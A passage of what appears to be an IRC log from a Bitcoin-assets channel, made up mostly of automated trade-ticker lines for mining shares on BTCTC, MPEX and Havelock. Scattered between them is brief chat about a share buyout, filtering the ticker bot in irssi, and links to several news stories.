2 @ 4.620008 = 9.24 BTC [-] Jul 22 10:51:10 [BTCTC] [ASICMINER-PT] 4 @ 4.620006 = 18.48 BTC [-] Jul 22 10:51:12 [BTCTC] [ASICMINER-PT] 2 @ 4.61005 = 9.2201 BTC [-] Jul 22 10:51:23 [BTCTC] [ASICMINER-PT] 2 @ 4.610001 = 9.22 BTC [-] Jul 22 10:52:40 [BTCTC] [AMC-PT] 100 @ 0.003447 = 0.3447 BTC [+] Jul 22 10:52:42 [BTCTC] [AMC-PT] 200 @ 0.003448 = 0.6896 BTC [+] Jul 22 10:52:43 [BTCTC] [AMC-PT] 250 @ 0.003495 = 0.8738 BTC [+] Jul 22 10:52:44 [BTCTC] [AMC-PT] 1038 @ 0.003498 = 3.6309 BTC [+] Jul 22 10:52:45 [BTCTC] [AMC-PT] 276 @ 0.003499 = 0.9657 BTC [+] Jul 22 10:52:46 [BTCTC] [AMC-PT] 100 @ 0.0035 = 0.35 BTC [+] Jul 22 10:52:48 [BTCTC] [AMC-PT] 98 @ 0.0035 = 0.343 BTC [+] Jul 22 10:52:57 [BTCTC] [AMC-PT] 1000 @ 0.0035 = 3.5 BTC [+] Jul 22 10:52:59 [BTCTC] [AMC-PT] 700 @ 0.0035 = 2.45 BTC [+] Jul 22 10:53:01 [BTCTC] [AMC-PT] 500 @ 0.0035 = 1.75 BTC [+] Jul 22 10:53:03 [BTCTC] [AMC-PT] 100 @ 0.0035 = 0.35 BTC [+] Jul 22 10:53:04 [BTCTC] [AMC-PT] 105 @ 0.0035 = 0.3675 BTC [+] Jul 22 10:53:05 [MPEX] [S.MPOE] 5300 @ 0.00080975 = 4.2917 BTC [+] Jul 22 10:54:57 [BTCTC] [ASICMINER-PT] 2 @ 4.6021 = 9.2042 BTC [-] Jul 22 10:55:36 [BTCTC] [ASICMINER-PT] 1 @ 4.6021 BTC [-] Jul 22 10:56:04 [BTCTC] [ASICMINER-PT] 1 @ 4.602 BTC [-] Jul 22 10:56:06 [BTCTC] [ASICMINER-PT] 1 @ 4.600001 BTC [-] Jul 22 10:56:08 [BTCTC] [ASICMINER-PT] 20 @ 4.6 = 92 BTC [-] Jul 22 11:05:02 [BTCTC] [AMC-PT] 1 @ 0.003549 BTC [+] Jul 22 11:05:29 [BTCTC] [BTC-TRADING-PT] 1 @ 0.9605 BTC [+] Jul 22 11:08:25 [BTCTC] [AMC-PT] 99 @ 0.003549 = 0.3514 BTC [+] Jul 22 11:08:27 [BTCTC] [AMC-PT] 302 @ 0.00355 = 1.0721 BTC [+] Jul 22 11:08:28 [BTCTC] [AMC-PT] 10 @ 0.0036 = 0.036 BTC [+] Jul 22 11:08:30 [BTCTC] [AMC-PT] 100 @ 0.0036 = 0.36 BTC [+] Jul 22 11:08:31 [BTCTC] [AMC-PT] 1000 @ 0.0036 = 3.6 BTC [+] Jul 22 11:08:32 [BTCTC] [AMC-PT] 290 @ 0.0036 = 1.044 BTC [+] Jul 22 11:08:34 [BTCTC] [AMC-PT] 4053 @ 0.00368 = 14.915 BTC [+] Jul 22 11:08:35 [BTCTC] [AMC-PT] 6183 @ 0.00369 = 22.8153 BTC [+] Jul 22 11:09:05 [BTCTC] [AMC-PT] 19 @ 0.003549 = 0.0674 BTC [-] Jul 22 11:10:46 [BTCTC] [AMC-PT] 963 @ 0.003549 = 3.4177 BTC [-] Jul 22 11:19:29 [BTCTC] [AMC-PT] 1000 @ 0.0036 = 3.6 BTC [+] Jul 22 11:23:57 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.003565 = 0.0463 BTC [-] Jul 22 11:24:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.045138 = 0.2708 BTC [-] Jul 22 11:25:53 [BTCTC] [AMC-PT] 9 @ 0.003699 = 0.0333 BTC [+] Jul 22 11:27:21 [BTCTC] [AMC-PT] 91 @ 0.003699 = 0.3366 BTC [+] Jul 22 11:27:23 [BTCTC] [AMC-PT] 6 @ 0.0037 = 0.0222 BTC [+] Jul 22 11:29:38 [BTCTC] [AMC-PT] 94 @ 0.0037 = 0.3478 BTC [+] Jul 22 11:29:40 [BTCTC] [AMC-PT] 500 @ 0.0037 = 1.85 BTC [+] Jul 22 11:30:37 [BTCTC] [AMC-PT] 600 @ 0.0037 = 2.22 BTC [+] Jul 22 11:33:46 [BTCTC] [TAT.ASICMINER] 8 @ 0.04514 = 0.3611 BTC [+] Jul 22 11:38:08 [BTCTC] [AMC-PT] 100 @ 0.003749 = 0.3749 BTC [+] Jul 22 11:39:05 [BTCTC] [AMC-PT] 100 @ 0.003749 = 0.3749 BTC [+] Jul 22 11:43:31 [HAVELOCK] [AM100] 80 @ 0.043212 = 3.457 BTC [-] Jul 22 11:46:48 [BTCTC] [AMC-PT] 10 @ 0.00375 = 0.0375 BTC [+] Jul 22 11:46:49 [BTCTC] [AMC-PT] 320 @ 0.00375 = 1.2 BTC [+] Jul 22 11:49:13 [HAVELOCK] [AM100] 12 @ 0.043212 = 0.5185 BTC [-] Jul 22 11:56:13 [BTCTC] [DMS.MINING] 18 @ 0.014201 = 0.2556 BTC [-] Jul 22 11:57:37 [BTCTC] [AMC-PT] 100 @ 0.003749 = 0.3749 BTC [-] Jul 22 11:57:38 [BTCTC] [AMC-PT] 500 @ 0.003749 = 1.8745 BTC [-] Jul 22 11:59:20 [HAVELOCK] [HIM] 3 @ 0.2511 = 0.7533 BTC [-] Jul 22 11:59:32 [HAVELOCK] [HIM] 1 @ 0.252 BTC [+] Jul 22 12:03:11 [BTCTC] [AMC-PT] 95 @ 0.003749 = 0.3562 BTC [-] Jul 22 12:03:15 [BTCTC] [AMC-PT] 105 @ 0.003749 = 0.3936 BTC [-] Jul 22 12:03:17 [BTCTC] [AMC-PT] 1860 @ 0.00375 = 6.975 BTC [+] Jul 22 12:03:19 [BTCTC] [AMC-PT] 150 @ 0.003913 = 0.587 BTC [+] Jul 22 12:03:20 [BTCTC] [AMC-PT] 700 @ 0.003913 = 2.7391 BTC [+] Jul 22 12:03:22 [BTCTC] [AMC-PT] 500 @ 0.00399 = 1.995 BTC [+] Jul 22 12:03:23 [BTCTC] [AMC-PT] 330 @ 0.003992 = 1.3174 BTC [+] Jul 22 12:03:25 [BTCTC] [AMC-PT] 355 @ 0.003993 = 1.4175 BTC [+] Jul 22 12:03:48 [BTCTC] [AMC-PT] 2 @ 0.003749 = 0.0075 BTC [-] Jul 22 12:05:25 [MPEX] [S.MPOE] 1050 @ 0.00080975 = 0.8502 BTC [+] Jul 22 12:05:27 [MPEX] [S.MPOE] 2331 @ 0.0008089 = 1.8855 BTC [-] Jul 22 12:05:30 [BTCTC] [AMC-PT] 198 @ 0.003749 = 0.7423 BTC [-] Jul 22 12:05:32 [BTCTC] [AMC-PT] 400 @ 0.00399 = 1.596 BTC [+] Jul 22 12:05:34 [BTCTC] [AMC-PT] 120 @ 0.003993 = 0.4792 BTC [+] Jul 22 12:05:36 [BTCTC] [AMC-PT] 262 @ 0.003993 = 1.0462 BTC [+] Jul 22 12:06:02 [BTCTC] [AMC-PT] 500 @ 0.003993 = 1.9965 BTC [+] Jul 22 12:06:47 [BTCTC] [AMC-PT] 20 @ 0.003993 = 0.0799 BTC [+] Jul 22 12:09:16 [BTCTC] [AMC-PT] 10 @ 0.003651 = 0.0365 BTC [-] Jul 22 12:10:08 [BTCTC] [AMC-PT] 74 @ 0.00366 = 0.2708 BTC [+] Jul 22 12:12:49 [BTCTC] [AMC-PT] 74 @ 0.00399 = 0.2953 BTC [+] Jul 22 12:13:53 [BTCTC] [AMC-PT] 26 @ 0.00399 = 0.1037 BTC [+] Jul 22 12:15:57 [BTCTC] [AMC-PT] 1000 @ 0.003992 = 3.992 BTC [+] Jul 22 12:15:59 [BTCTC] [AMC-PT] 500 @ 0.003992 = 1.996 BTC [+] Jul 22 12:16:22 [BTCTC] [TAT.ASICMINER] 11 @ 0.045152 = 0.4967 BTC [+] Jul 22 12:17:08 [HAVELOCK] [SMG] 100 @ 0.00028 = 0.028 BTC [+] Jul 22 12:17:27 [BTCTC] [AMC-PT] 218 @ 0.003993 = 0.8705 BTC [+] Jul 22 12:17:28 [BTCTC] [AMC-PT] 282 @ 0.003993 = 1.126 BTC [+] Jul 22 12:22:10 [BTCTC] [AMC-PT] 4 @ 0.003991 = 0.016 BTC [-] Jul 22 12:26:22 [BTCTC] [ASICMINER-PT] 1 @ 4.689999 BTC [+] Jul 22 12:30:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.045156 BTC [+] Jul 22 12:30:47 [MPEX] [S.MPOE] 3988 @ 0.0008089 = 3.2259 BTC [-] Jul 22 12:31:45 [BTCTC] [AMC-PT] 14 @ 0.003991 = 0.0559 BTC [-] Jul 22 12:33:35 [BTCTC] [GSDPT] 1 @ 0.003449 BTC [+] Jul 22 12:33:38 [BTCTC] [AMC-PT] 8 @ 0.003991 = 0.0319 BTC [-] Jul 22 12:34:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.045581 BTC [+] Jul 22 12:36:09 [BTCTC] [AMC-PT] 8 @ 0.003991 = 0.0319 BTC [-] Jul 22 12:37:00 [BTCTC] [AMC-PT] 216 @ 0.003991 = 0.8621 BTC [-] Jul 22 12:37:02 [BTCTC] [AMC-PT] 6300 @ 0.003999 = 25.1937 BTC [+] Jul 22 12:37:03 [BTCTC] [AMC-PT] 1000 @ 0.004 = 4 BTC [+] Jul 22 12:37:05 [BTCTC] [AMC-PT] 150 @ 0.004 = 0.6 BTC [+] Jul 22 12:37:05 [BTCTC] [AMC-PT] 500 @ 0.004 = 2 BTC [+] Jul 22 12:38:26 [BTCTC] [DMS.SELLING] 300 @ 0.02529 = 7.587 BTC [+] Jul 22 12:38:27 [BTCTC] [GSDPT] 16 @ 0.0034 = 0.0544 BTC [-] Jul 22 12:38:44 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 22 12:38:46 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 22 12:39:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.04558 BTC [-] Jul 22 12:39:29 [BTCTC] [AMC-PT] 2 @ 0.004099 = 0.0082 BTC [+] Jul 22 12:40:39 [BTCTC] [AMC-PT] 1 @ 0.00365 BTC [-] Jul 22 12:43:12 [BTCTC] [AMC-PT] 1 @ 0.004 BTC [+] Jul 22 12:43:14 [BTCTC] [AMC-PT] 5272 @ 0.004099 = 21.6099 BTC [+] Jul 22 12:43:15 [BTCTC] [AMC-PT] 4999 @ 0.004199 = 20.9908 BTC [+] Jul 22 12:44:26 [BTCTC] [AMC-PT] 1 @ 0.00366 BTC [-] Jul 22 12:47:36 [BTCTC] [AMC-PT] 1 @ 0.003669 BTC [+] Jul 22 12:47:46 [BTCTC] [AMC-PT] 1 @ 0.004199 BTC [+] Jul 22 12:48:57 [BTCTC] [AMC-PT] 10 @ 0.004319 = 0.0432 BTC [+] Jul 22 12:49:36 [BTCTC] [AMC-PT] 9 @ 0.00432 = 0.0389 BTC [+] Jul 22 12:50:07 [MPEX] [S.MPOE] 10474 @ 0.000811 = 8.4944 BTC [+] Jul 22 12:52:23 [BTCTC] [AMC-PT] 100 @ 0.0044 = 0.44 BTC [+] Jul 22 12:52:26 [BTCTC] [AMC-PT] 30 @ 0.0044 = 0.132 BTC [+] Jul 22 12:53:09 [BTCTC] [AMC-PT] 370 @ 0.0044 = 1.628 BTC [+] Jul 22 12:53:42 [BTCTC] [AMC-PT] 1000 @ 0.004463 = 4.463 BTC [+] Jul 22 12:53:44 [BTCTC] [AMC-PT] 5 @ 0.004499 = 0.0225 BTC [+] Jul 22 12:53:46 [BTCTC] [AMC-PT] 1 @ 0.0045 BTC [+] Jul 22 12:53:47 [BTCTC] [AMC-PT] 500 @ 0.0045 = 2.25 BTC [+] Jul 22 12:53:49 [BTCTC] [AMC-PT] 1000 @ 0.0045 = 4.5 BTC [+] Jul 22 12:54:50 [BTCTC] [AMC-PT] 94 @ 0.0045 = 0.423 BTC [+] Jul 22 12:56:02 [BTCTC] [AMC-PT] 1 @ 0.0037 BTC [-] Jul 22 12:56:04 [HAVELOCK] [AM100] 2 @ 0.043311 = 0.0866 BTC [+] Jul 22 12:56:06 [HAVELOCK] [AM100] 54 @ 0.043311 = 2.3388 BTC [+] Jul 22 12:57:55 Go Havelock! Jul 22 12:58:33 havelock is just an exchange Jul 22 12:59:08 Havelock Investments - "We're more than just an exchange" Jul 22 13:00:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.045574 = 0.4557 BTC [-] Jul 22 13:00:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.045575 = 0.2279 BTC [+] Jul 22 13:05:24 hi all Jul 22 13:05:47 hello Jul 22 13:06:59 [BTCTC] [AMC-PT] 1 @ 0.00385 BTC [+] Jul 22 13:09:07 [BTCTC] [AMC-PT] 1 @ 0.004449 BTC [+] Jul 22 13:11:49 [BTCTC] [AMC-PT] 200 @ 0.00445 = 0.89 BTC [+] Jul 22 13:12:46 hi mjr_ Jul 22 13:14:32 [BTCTC] [RSM] 10 @ 0.0175 = 0.175 BTC [-] Jul 22 13:14:34 [BTCTC] [RSM] 38 @ 0.01706 = 0.6483 BTC [-] Jul 22 13:14:36 [BTCTC] [RSM] 48 @ 0.01701 = 0.8165 BTC [-] Jul 22 13:14:38 [BTCTC] [RSM] 10 @ 0.017 = 0.17 BTC [-] Jul 22 13:14:39 [BTCTC] [RSM] 70 @ 0.017 = 1.19 BTC [-] Jul 22 13:14:41 [BTCTC] [RSM] 24 @ 0.016889 = 0.4053 BTC [-] Jul 22 13:16:57 [BTCTC] [AMC-PT] 100 @ 0.00445 = 0.445 BTC [+] Jul 22 13:17:03 whats new Jul 22 13:17:45 [BTCTC] [AMC-PT] 100 @ 0.004499 = 0.4499 BTC [+] Jul 22 13:18:54 [BTCTC] [AMC-PT] 13 @ 0.004325 = 0.0562 BTC [-] Jul 22 13:20:17 [HAVELOCK] [VTX] 11 @ 0.526 = 5.786 BTC [-] Jul 22 13:20:30 [HAVELOCK] [VTX] 2 @ 0.52500001 = 1.05 BTC [-] Jul 22 13:20:38 [HAVELOCK] [VTX] 2 @ 0.525 = 1.05 BTC [-] Jul 22 13:20:50 [HAVELOCK] [VTX] 1 @ 0.52000001 BTC [-] Jul 22 13:20:59 mjr_: S.MG got passthroughs, mining got more bubbly pumpling, s.dice got bought Jul 22 13:21:00 [HAVELOCK] [VTX] 10 @ 0.52 = 5.2 BTC [-] Jul 22 13:21:11 [HAVELOCK] [VTX] 1 @ 0.51 BTC [-] Jul 22 13:21:16 [BTCTC] [COGNITIVE] 1 @ 0.800001 BTC [+] Jul 22 13:21:20 [BTCTC] [COGNITIVE] 1 @ 0.8 BTC [-] Jul 22 13:21:21 [HAVELOCK] [VTX] 9 @ 0.5 = 4.5 BTC [-] Jul 22 13:21:24 [BTCTC] [COGNITIVE] 5 @ 0.79 = 3.95 BTC [-] Jul 22 13:21:30 [HAVELOCK] [VTX] 1 @ 0.47 BTC [-] Jul 22 13:22:22 [BTCTC] [AMC-PT] 100 @ 0.0045 = 0.45 BTC [+] Jul 22 13:22:23 [BTCTC] [AMC-PT] 1500 @ 0.0045 = 6.75 BTC [+] Jul 22 13:25:40 [BTCTC] [AMC-PT] 100 @ 0.00472 = 0.472 BTC [+] Jul 22 13:25:42 [BTCTC] [AMC-PT] 1100 @ 0.004749 = 5.2239 BTC [+] Jul 22 13:26:20 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 22 13:26:34 [BTCTC] [AMC-PT] 30 @ 0.004608 = 0.1382 BTC [-] Jul 22 13:26:36 [BTCTC] [AMC-PT] 125 @ 0.004607 = 0.5759 BTC [-] Jul 22 13:26:37 [BTCTC] [AMC-PT] 345 @ 0.0044 = 1.518 BTC [-] Jul 22 13:27:12 [BTCTC] [BASIC-MINING] 1 @ 0.661001 BTC [-] Jul 22 13:27:45 [MPEX] [S.MPOE] 5350 @ 0.0008089 = 4.3276 BTC [-] Jul 22 13:27:48 [BTCTC] [AMC-PT] 125 @ 0.0047 = 0.5875 BTC [+] Jul 22 13:28:46 [BTCTC] [AMC-PT] 4 @ 0.004748 = 0.019 BTC [+] Jul 22 13:32:24 [BTCTC] [AMC-PT] 400 @ 0.0045 = 1.8 BTC [-] Jul 22 13:32:26 [BTCTC] [AMC-PT] 100 @ 0.004401 = 0.4401 BTC [-] Jul 22 13:32:27 [BTCTC] [AMC-PT] 155 @ 0.0044 = 0.682 BTC [-] Jul 22 13:32:28 [BTCTC] [AMC-PT] 400 @ 0.00426 = 1.704 BTC [-] Jul 22 13:32:30 [BTCTC] [AMC-PT] 100 @ 0.00425 = 0.425 BTC [-] Jul 22 13:33:07 [BTCTC] [AMC-PT] 200 @ 0.0042 = 0.84 BTC [-] Jul 22 13:33:09 [BTCTC] [AMC-PT] 400 @ 0.004 = 1.6 BTC [-] Jul 22 13:33:22 [BTCTC] [AMC-PT] 1000 @ 0.004 = 4 BTC [-] Jul 22 13:33:27 [BTCTC] [AMC-PT] 170 @ 0.004 = 0.68 BTC [-] Jul 22 13:34:38 [BTCTC] [AMC-PT] 100 @ 0.004 = 0.4 BTC [-] Jul 22 13:44:06 [BTCTC] [AMC-PT] 16 @ 0.004449 = 0.0712 BTC [+] Jul 22 13:44:10 [BTCTC] [AMC-PT] 227 @ 0.00445 = 1.0102 BTC [+] Jul 22 13:44:12 [BTCTC] [AMC-PT] 484 @ 0.004493 = 2.1746 BTC [+] Jul 22 13:44:31 [BTCTC] [AMC-PT] 16 @ 0.004493 = 0.0719 BTC [+] Jul 22 13:45:13 [BTCTC] [AMC-PT] 100 @ 0.004498 = 0.4498 BTC [+] Jul 22 13:45:14 [BTCTC] [AMC-PT] 509 @ 0.0045 = 2.2905 BTC [+] Jul 22 13:45:16 [BTCTC] [AMC-PT] 391 @ 0.00455 = 1.7791 BTC [+] Jul 22 13:45:47 [BTCTC] [AMC-PT] 207 @ 0.00435 = 0.9005 BTC [-] Jul 22 13:46:07 [BTCTC] [AMC-PT] 250 @ 0.004493 = 1.1233 BTC [+] Jul 22 13:46:50 [BTCTC] [AMC-PT] 19 @ 0.004549 = 0.0864 BTC [+] Jul 22 13:49:07 [BTCTC] [AMC-PT] 316 @ 0.0045 = 1.422 BTC [-] Jul 22 13:52:09 [HAVELOCK] [SMG] 2000 @ 0.00028 = 0.56 BTC [+] Jul 22 13:53:04 [BTCTC] [BASIC-MINING] 1 @ 0.661001 BTC [-] Jul 22 13:54:07 [BTCTC] [DMS.MINING] 1 @ 0.01519 BTC [+] Jul 22 13:54:39 [BTCTC] [AMC-PT] 282 @ 0.004375 = 1.2338 BTC [-] Jul 22 13:55:29 [BTCTC] [AMC-PT] 8 @ 0.00435 = 0.0348 BTC [-] Jul 22 13:55:31 [BTCTC] [AMC-PT] 100 @ 0.004151 = 0.4151 BTC [-] Jul 22 13:55:33 [BTCTC] [AMC-PT] 100 @ 0.004101 = 0.4101 BTC [-] Jul 22 13:55:34 [BTCTC] [AMC-PT] 500 @ 0.0041 = 2.05 BTC [-] Jul 22 13:57:35 [BTCTC] [AMC-PT] 1 @ 0.004325 BTC [+] Jul 22 13:58:52 [BTCTC] [AMC-PT] 150 @ 0.00425 = 0.6375 BTC [-] Jul 22 14:01:43 [BTCTC] [ASICMINER-PT] 5 @ 4.717 = 23.585 BTC [+] Jul 22 14:03:18 [BTCTC] [AMC-PT] 150 @ 0.004275 = 0.6413 BTC [+] Jul 22 14:03:20 [BTCTC] [AMC-PT] 230 @ 0.00433 = 0.9959 BTC [+] Jul 22 14:03:21 [BTCTC] [AMC-PT] 100 @ 0.00437 = 0.437 BTC [+] Jul 22 14:03:23 [BTCTC] [AMC-PT] 500 @ 0.004375 = 2.1875 BTC [+] Jul 22 14:03:24 [BTCTC] [AMC-PT] 1102 @ 0.004398 = 4.8466 BTC [+] Jul 22 14:05:19 [BTCTC] [AMC-PT] 10 @ 0.0043 = 0.043 BTC [-] Jul 22 14:05:45 [BTCTC] [AMC-PT] 2 @ 0.00435 = 0.0087 BTC [+] Jul 22 14:06:05 [BTCTC] [AMC-PT] 249 @ 0.00435 = 1.0832 BTC [+] Jul 22 14:06:24 [BTCTC] [AMC-PT] 531 @ 0.00426 = 2.2621 BTC [-] Jul 22 14:06:26 [BTCTC] [AMC-PT] 100 @ 0.00425 = 0.425 BTC [-] Jul 22 14:06:27 [BTCTC] [AMC-PT] 7800 @ 0.00425 = 33.15 BTC [-] Jul 22 14:06:54 [BTCTC] [AMC-PT] 45 @ 0.00425 = 0.1913 BTC [-] Jul 22 14:08:26 [BTCTC] [AMC-PT] 60 @ 0.004335 = 0.2601 BTC [+] Jul 22 14:08:37 [BTCTC] [AMC-PT] 68 @ 0.004335 = 0.2948 BTC [+] Jul 22 14:09:16 [BTCTC] [AMC-PT] 327 @ 0.004335 = 1.4175 BTC [+] Jul 22 14:09:32 [BTCTC] [AMC-PT] 9 @ 0.00435 = 0.0392 BTC [+] Jul 22 14:09:34 [BTCTC] [AMC-PT] 94 @ 0.00435 = 0.4089 BTC [+] Jul 22 14:09:35 wtf Jul 22 14:10:00 crazy bubble pumping Jul 22 14:11:21 heard about s.dice, very cool Jul 22 14:11:31 75% premium paid to public holders Jul 22 14:11:32 [BTCTC] [AMC-PT] 54 @ 0.00439 = 0.2371 BTC [+] Jul 22 14:11:33 [BTCTC] [AMC-PT] 81 @ 0.00435 = 0.3524 BTC [-] Jul 22 14:11:57 i sold my shares of s dice literally less than 12 hours before the sale was announced Jul 22 14:12:01 i felt pretty cool Jul 22 14:12:02 I added AMC-PT to my /ignores Jul 22 14:12:24 [BTCTC] [AMC-PT] 216 @ 0.00435 = 0.9396 BTC [-] Jul 22 14:12:26 [BTCTC] [AMC-PT] 60 @ 0.00435 = 0.261 BTC [-] Jul 22 14:12:56 [BTCTC] [AMC-PT] 100 @ 0.00436 = 0.436 BTC [+] Jul 22 14:17:52 how do you ignore certain assets pankkake? Jul 22 14:18:59 with irssi, for example: /ignore -pattern AMC-PT -channels #bitcoin-assets assbot Jul 22 14:19:42 [BTCTC] [AMC-PT] 15 @ 0.00425 = 0.0638 BTC [-] Jul 22 14:19:43 [BTCTC] [AMC-PT] 250 @ 0.004225 = 1.0563 BTC [-] Jul 22 14:19:51 ahh thank you Jul 22 14:19:54 [BTCTC] [DMS.SELLING] 11 @ 0.0255 = 0.2805 BTC [+] Jul 22 14:20:03 actually is there a way to only allow certain assets to come through? Jul 22 14:20:13 basically the opposite of ignore Jul 22 14:20:52 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.003351 BTC [-] Jul 22 14:20:55 Ignore everything but the ones you wanna hear Jul 22 14:21:12 yes you can /ignore the bot and then do some /ignore -except Jul 22 14:22:50 [BTCTC] [AMC-PT] 50 @ 0.00421 = 0.2105 BTC [-] Jul 22 14:22:58 k thanks for the help pankkake Jul 22 14:23:04 [BTCTC] [AMC-PT] 100 @ 0.004102 = 0.4102 BTC [-] Jul 22 14:23:06 [BTCTC] [AMC-PT] 100 @ 0.004052 = 0.4052 BTC [-] Jul 22 14:23:08 [BTCTC] [AMC-PT] 500 @ 0.004051 = 2.0255 BTC [-] Jul 22 14:23:10 [BTCTC] [AMC-PT] 100 @ 0.00405 = 0.405 BTC [-] Jul 22 14:23:11 [BTCTC] [AMC-PT] 500 @ 0.004 = 2 BTC [-] Jul 22 14:23:13 [BTCTC] [AMC-PT] 1500 @ 0.004 = 6 BTC [-] Jul 22 14:23:14 [BTCTC] [AMC-PT] 100 @ 0.004 = 0.4 BTC [-] Jul 22 14:24:36 [HAVELOCK] [SMG] 350 @ 0.000265 = 0.0928 BTC [-] Jul 22 14:24:39 [HAVELOCK] [SMG] 200 @ 0.000261 = 0.0522 BTC [-] Jul 22 14:24:51 [BTCTC] [AMC-PT] 100 @ 0.003851 = 0.3851 BTC [-] Jul 22 14:26:43 [BTCTC] [AMC-PT] 25 @ 0.004 = 0.1 BTC [+] Jul 22 14:28:23 [BTCTC] [AMC-PT] 19 @ 0.003852 = 0.0732 BTC [-] Jul 22 14:28:25 [BTCTC] [AMC-PT] 8 @ 0.003851 = 0.0308 BTC [-] Jul 22 14:28:46 [BTCTC] [AMC-PT] 280 @ 0.003851 = 1.0783 BTC [-] Jul 22 14:28:48 [BTCTC] [AMC-PT] 100 @ 0.00385 = 0.385 BTC [-] Jul 22 14:29:47 [BTCTC] [AMC-PT] 27 @ 0.00367 = 0.0991 BTC [-] Jul 22 14:29:49 [BTCTC] [ASICMINER-PT] 1 @ 4.716 BTC [-] Jul 22 14:30:36 [BTCTC] [AMC-PT] 44 @ 0.00367 = 0.1615 BTC [-] Jul 22 14:31:29 [BTCTC] [AMC-PT] 1 @ 0.003669 BTC [-] Jul 22 14:31:32 [BTCTC] [AMC-PT] 50 @ 0.0036 = 0.18 BTC [-] Jul 22 14:31:34 [BTCTC] [AMC-PT] 84 @ 0.003552 = 0.2984 BTC [-] Jul 22 14:31:34 [BTCTC] [AMC-PT] 621 @ 0.00352 = 2.1859 BTC [-] Jul 22 14:31:54 [BTCTC] [TAT.ASICMINER] 20 @ 0.045674 = 0.9135 BTC [+] Jul 22 14:33:26 [BTCTC] [AMC-PT] 203 @ 0.0037 = 0.7511 BTC [+] Jul 22 14:34:46 [BTCTC] [AMC-PT] 203 @ 0.003744 = 0.76 BTC [+] Jul 22 14:35:35 [BTCTC] [AMC-PT] 1 @ 0.003728 BTC [-] Jul 22 14:38:15 [BTCTC] [AMC-PT] 165 @ 0.003722 = 0.6141 BTC [-] Jul 22 14:40:10 [BTCTC] [AMC-PT] 1 @ 0.003722 BTC [-] Jul 22 14:40:54 [BTCTC] [AMC-PT] 6 @ 0.003722 = 0.0223 BTC [-] Jul 22 14:43:05 [BTCTC] [DMS.PURCHASE] 223 @ 0.039476 = 8.8031 BTC [-] Jul 22 14:44:14 another day in paradise here Jul 22 14:44:34 [BTCTC] [B.YABMC] 4 @ 0.0027 = 0.0108 BTC [-] Jul 22 14:44:35 [BTCTC] [AMC-PT] 31 @ 0.003722 = 0.1154 BTC [-] Jul 22 14:44:36 [BTCTC] [DMS.PURCHASE] 77 @ 0.039477 = 3.0397 BTC [+] Jul 22 14:44:39 [BTCTC] [AMC-PT] 191 @ 0.003721 = 0.7107 BTC [-] Jul 22 14:45:32 [BTCTC] [AMC-PT] 200 @ 0.003712 = 0.7424 BTC [-] Jul 22 14:45:42 [BTCTC] [AMC-PT] 3 @ 0.003712 = 0.0111 BTC [-] Jul 22 14:46:00 [BTCTC] [AMC-PT] 9 @ 0.003712 = 0.0334 BTC [-] Jul 22 14:47:28 [BTCTC] [AMC-PT] 212 @ 0.003707 = 0.7859 BTC [-] Jul 22 14:47:30 [BTCTC] [AMC-PT] 1050 @ 0.0037 = 3.885 BTC [-] Jul 22 14:47:35 [BTCTC] [AMC-PT] 3788 @ 0.00368 = 13.9398 BTC [-] Jul 22 14:47:38 [BTCTC] [ASICMINER-PT] 3 @ 4.716 = 14.148 BTC [-] Jul 22 14:48:44 [BTCTC] [DMS.MINING] 100 @ 0.015 = 1.5 BTC [-] Jul 22 14:48:55 [BTCTC] [DMS.SELLING] 1 @ 0.0247 BTC [-] Jul 22 14:49:27 [BTCTC] [AMC-PT] 212 @ 0.00368 = 0.7802 BTC [-] Jul 22 14:49:32 [BTCTC] [ASICMINER-PT] 1 @ 4.719949 BTC [+] Jul 22 14:49:34 [BTCTC] [ASICMINER-PT] 2 @ 4.71995 = 9.4399 BTC [+] Jul 22 14:50:32 [BTCTC] [LTC-ATF.B2] 11 @ 0.010001 = 0.11 BTC [+] Jul 22 14:51:03 [BTCTC] [AMC-PT] 936 @ 0.003501 = 3.2769 BTC [-] Jul 22 14:51:12 [BTCTC] [DMS.PURCHASE] 1 @ 0.039477 BTC [+] Jul 22 14:51:41 [BTCTC] [AMC-PT] 212 @ 0.003705 = 0.7855 BTC [+] Jul 22 14:51:43 [BTCTC] [AMC-PT] 38 @ 0.00371 = 0.141 BTC [+] Jul 22 14:51:44 [BTCTC] [AMC-PT] 548 @ 0.003715 = 2.0358 BTC [+] Jul 22 14:51:46 [BTCTC] [AMC-PT] 85 @ 0.003725 = 0.3166 BTC [+] Jul 22 14:51:47 [BTCTC] [AMC-PT] 1000 @ 0.00378 = 3.78 BTC [+] Jul 22 14:51:48 [BTCTC] [AMC-PT] 1000 @ 0.0038 = 3.8 BTC [+] Jul 22 14:52:09 [BTCTC] [AMC-PT] 164 @ 0.003501 = 0.5742 BTC [-] Jul 22 14:52:11 [BTCTC] [AMC-PT] 30 @ 0.003501 = 0.105 BTC [-] Jul 22 14:55:46 Food consumption arb: http://www.chicagotribune.com/business/breaking/chi-dubai-gold-for-weight-loss-20130719,0,1179654.story Jul 22 14:56:07 [BTCTC] [AMC-PT] 200 @ 0.003705 = 0.741 BTC [+] Jul 22 14:56:21 Wow Jul 22 14:56:25 http://www.mcclatchydc.com/2013/07/18/197069/fbi-announces-review-of-2000-cases.html#.Ue0d141vOXs Jul 22 14:56:26 I should move to dubai Jul 22 14:56:27 FBI announces review of 2,000 cases featuring hair samples | McClatchy Jul 22 14:56:53 I've lost over 50 pounds in the last 4 months Jul 22 14:57:06 I wonder how much gold that would be Jul 22 14:57:09 [BTCTC] [DMS.SELLING] 30 @ 0.0252 = 0.756 BTC [+] Jul 22 14:57:12 You sold too soon Jul 22 14:57:15 i would gain more weight first Jul 22 14:57:23 bad fat trading Jul 22 14:57:42 http://www.dailymail.co.uk/news/article-2372833/Internet-porn-block-EVERY-home-Victory-Mail-PM-David-Cameron-pledges-opt-rule.html Jul 22 14:57:45 Internet porn block on EVERY home: Victory for the Mail as PM David Cameron pledges 'opt in' rule | Jul 22 14:57:54 wtf of the day goes to ^ Jul 22 14:58:05 I 